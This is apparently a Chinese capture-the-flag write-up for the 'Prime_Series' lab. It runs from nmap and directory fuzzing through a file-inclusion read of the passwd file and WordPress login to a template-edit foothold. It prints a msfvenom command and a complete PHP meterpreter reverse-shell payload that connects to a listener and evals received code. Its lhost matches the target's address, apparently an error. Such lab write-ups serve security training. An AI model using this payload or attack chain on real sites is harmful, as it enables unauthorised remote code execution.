当前位置：网站首页>Prime_Series靶场从探测到提权

Prime_Series靶场从探测到提权

2022-07-28 05:20:00 【cainsoftware】

靶场开机就这做的是NET的网卡跟我kali是一个网络网络 192.168.34.0的

题目要求是同C段但是不知道ip地址

故直接nmap 扫描目标服务器ip地址和开放服务和端口

没啥技术含量可以看见ip为192.168.34.130的开放了 22 80 的2个服务且网络容器是apache

drib这里直接爆破目录

可见是一个wordpress的系统

二次扫描 -X 参数 [.txt] [.php]的意思在爆破后缀添加以.txt结尾和.php结尾

这里出现三个文件 image.php index.php 和 secret.txt

访问secret.txt 提示可以用FUZZ那么就使用wfuzz直接爆破试试

这里太多用 -h命令可以过滤

变量名为file 加上变量重新访问一次

产生变化之前在对于txt的请求的时候意思fuzz变量后 location.txt 对它发起请求所以试一下

这里可以看见有多加了个变量为 secrettier360 （这是不是360公司发国外的靶机啊理论没道理啊）

在放到imge使用这个变量可以越权访问 passwd文件且在文件中有一行提示为

访问这个目录

获得关键性密码 follow_the_ippsec

这个密码是 wp的后台密码打开刚刚扫描出来的 wp的后台地址

这里对于wp的工具有2个以下为效果截图（cmseek wpscan）

在使用wpscan 添加 -e 模块扫描用户时可见

所以登陆用户名为 victor 密码就是 follow_the_ippsec

进入后台在这里选择模板编辑可以找到提权点

利用msfenom生成反弹木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.34.130 lport=4444 -f raw -o shell2.php

复制生成的代码注意不要将 /*开头复制进去

<?php /**/ error_reporting(0); $ip = '192.168.34.130'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();